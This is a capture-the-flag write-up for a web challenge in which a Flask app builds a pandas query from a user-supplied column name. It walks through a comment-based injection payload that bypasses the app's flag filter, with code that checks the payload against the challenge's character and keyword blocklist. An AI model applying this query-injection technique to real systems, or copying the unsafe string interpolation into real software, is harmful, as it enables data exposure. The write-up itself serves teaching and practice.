web/rnd-data-science

Date, Time: Monday, 31-05-2024

Summary

The flag is actually written into the CSV, but app.py takes the name of the second column in the DataFrame and filters out every row whose value in that column is "FLAG". Any row with "FLAG" in the second column is therefore dropped before the CSV is returned, which keeps the flag from being shown.

To bypass this validation, you can inject a malicious second column header name such as tes == tes # and make the third column header tes. The # character comments out the != "FLAG" condition, and tes == tes creates a query that is always true because the value in the tes column is always equal to itself. This effectively bypasses the filter and allows all rows to be processed, including those containing the flag.

Solving

We are given app.py and generator_app.py.

app.py

from flask import Flask, request, send_file
from io import StringIO, BytesIO
import pandas as pd
import requests

app = Flask(__name__)


@app.route("/")
def index():
    return app.send_static_file('index.html')


@app.route("/generate", methods=['POST'])
def generate():
    data = request.form
    delimiter_const = 'delimiter'
    r = requests.post('http://127.0.0.1:5001', data=data)

    if r.text == 'ERROR':
        return 'ERROR'

    csv = StringIO(r.text)

    df = pd.read_csv(csv)

    # Filter out secrets
    first = list(df.columns.values)[1]
    df = df.query(f'{first} != "FLAG"')

    string_df = StringIO(df.to_csv(index=False, sep=data[delimiter_const]))
    bytes_df = BytesIO()
    bytes_df.write(string_df.getvalue().encode())
    bytes_df.seek(0)

    return send_file(bytes_df, download_name="data.csv")

generator_app.py

from flask import Flask, request
import random as rnd

app = Flask(__name__)

flag = open('flag.txt', 'r').read().rstrip()


@app.route("/", methods=['POST'])
def index():
    delimiter = request.form['delimiter']

    if len(delimiter) > 1:
        return 'ERROR'

    num_columns = int(request.form['numColumns'])
    if num_columns > 10:
        return 'ERROR'

    headers = ['id'] + [request.form["columnName" + str(i)] for i in range(num_columns)]

    forb_list = ['and', 'or', 'not']

    for header in headers:
        if len(header) > 120:
            return 'ERROR'
        for c in '\'"!@':
            if c in header:
                return 'ERROR'
        for forb_word in forb_list:
            if forb_word in header:
                return 'ERROR'

    csv_file = delimiter.join(headers)

    for i in range(10):
        row = [str(i)] + [str(rnd.randint(0, 100)) for _ in range(num_columns)]
        csv_file += '\n' + delimiter.join(row)

    row = [str('NaN')] + ['FLAG'] + [flag] + [str(0) for _ in range(num_columns)]
    csv_file += '\n' + delimiter.join(row[:len(headers)])

    return csv_file

app.py runs a Flask server that forwards the submitted form to a second Flask server, generator_app.py, and receives a CSV in response. generator_app.py builds that CSV from random values, with the column headers taken from the user input. Finally, generator_app.py appends one last row that holds NaN in the id column, the marker FLAG in the second column, and the flag itself in the third column, truncates that row to the number of headers, and returns the CSV to the requester.
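The way generator_app.py assembles its final row can be sketched in isolation. The snippet below is a minimal re-creation of that one step, assuming a placeholder flag value; build_flag_row is a hypothetical helper name, not part of the challenge source. It suggests that at least two user columns are needed, otherwise the truncation cuts the flag off before it ever reaches the CSV.

```python
def build_flag_row(headers, flag):
    """Mirror how generator_app.py builds and truncates its last row."""
    num_columns = len(headers) - 1  # headers = ['id'] + user-supplied columns
    row = ['NaN', 'FLAG', flag] + ['0'] * num_columns
    return row[:len(headers)]


placeholder = 'TBTL{placeholder}'  # assumption: stands in for the real flag

one_column = build_flag_row(['id', 'a'], placeholder)
two_columns = build_flag_row(['id', 'a', 'b'], placeholder)

print(one_column)   # ['NaN', 'FLAG']
print(two_columns)  # ['NaN', 'FLAG', 'TBTL{placeholder}']
```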

app.py receives the CSV and reads the name of the second column header. That name is then used to build the query that filters out the FLAG row.

The .query method takes a boolean expression and keeps only the rows for which it evaluates to true. Here, if the user input for the first user-supplied column (the second column of the CSV, right after id) is "num1", then the variable first is assigned "num1" and .query evaluates the expression num1 != "FLAG". This compares each value in the "num1" column with the string "FLAG"; any row for which the comparison is false, which is exactly the flag row, is filtered out.
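The filtering step can be imitated without pandas. The sketch below is only a stand-in: it evaluates the same query string once per row with Python's eval, using the row as the variable scope, whereas pandas evaluates the expression over whole columns. The sample rows and the placeholder flag are assumptions made for illustration.

```python
# Hypothetical sample data: one ordinary row and the flag row.
rows = [
    {'id': '0', 'num1': '42', 'num2': '7'},
    {'id': 'NaN', 'num1': 'FLAG', 'num2': 'TBTL{placeholder}'},
]

# Same steps as app.py: take the second column name, build the query string.
first = list(rows[0].keys())[1]
query = f'{first} != "FLAG"'

# Stand-in for df.query: keep the rows where the expression is true.
kept = [row for row in rows if eval(query, {}, row)]

print(query)  # num1 != "FLAG"
print(kept)   # [{'id': '0', 'num1': '42', 'num2': '7'}]
```

With a benign column name, only the ordinary row survives and the flag row is dropped.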

The idea I used to solve this challenge was to ask, "What if the user input for the second column name is malicious?" Because that name is interpolated directly into the query string, a simple payload there can alter the entire boolean expression that the .query method evaluates.

The user input for the second column name is "tes == tes #" and the third column name is "tes". Neither name contains any of the characters or words that generator_app.py rejects. The second column name is a malicious payload that compares the value of the "tes" column with itself, which is always true, so the flag row is not filtered out. The # comments out the != "FLAG" part of the expression that is hardcoded in the backend.
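The payload can be checked offline before sending it. The sketch below re-implements the header checks from generator_app.py (passes_generator_checks is a hypothetical name), builds the form fields the generator reads, and uses Python's own ast module to show what remains of the query once the comment is discarded. pandas does its own preprocessing before parsing, so the ast step is an approximation of its behavior, not a trace of it.

```python
import ast

FORBIDDEN_CHARS = '\'"!@'
FORBIDDEN_WORDS = ['and', 'or', 'not']


def passes_generator_checks(header):
    """Re-implementation of the per-header checks in generator_app.py."""
    if len(header) > 120:
        return False
    if any(c in header for c in FORBIDDEN_CHARS):
        return False
    return not any(word in header for word in FORBIDDEN_WORDS)


# Form fields read by generator_app.py; the values are the payload.
payload = {
    'delimiter': ',',
    'numColumns': '2',
    'columnName0': 'tes == tes #',  # becomes the second CSV column
    'columnName1': 'tes',           # becomes the third CSV column
}

headers = [payload['columnName0'], payload['columnName1']]
all_pass = all(passes_generator_checks(h) for h in headers)

# The string app.py would hand to df.query, and what a Python parser keeps.
query = f'{headers[0]} != "FLAG"'
parsed = ast.unparse(ast.parse(query, mode='eval'))

print(all_pass)  # True
print(query)     # tes == tes # != "FLAG"
print(parsed)    # tes == tes
```

Submitting these fields as a POST form to the /generate route of app.py should then return a CSV that still contains the flag row.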

Flag

TBTL{d4T4_5c13nc3_15_n07_f0r_r0ck135}

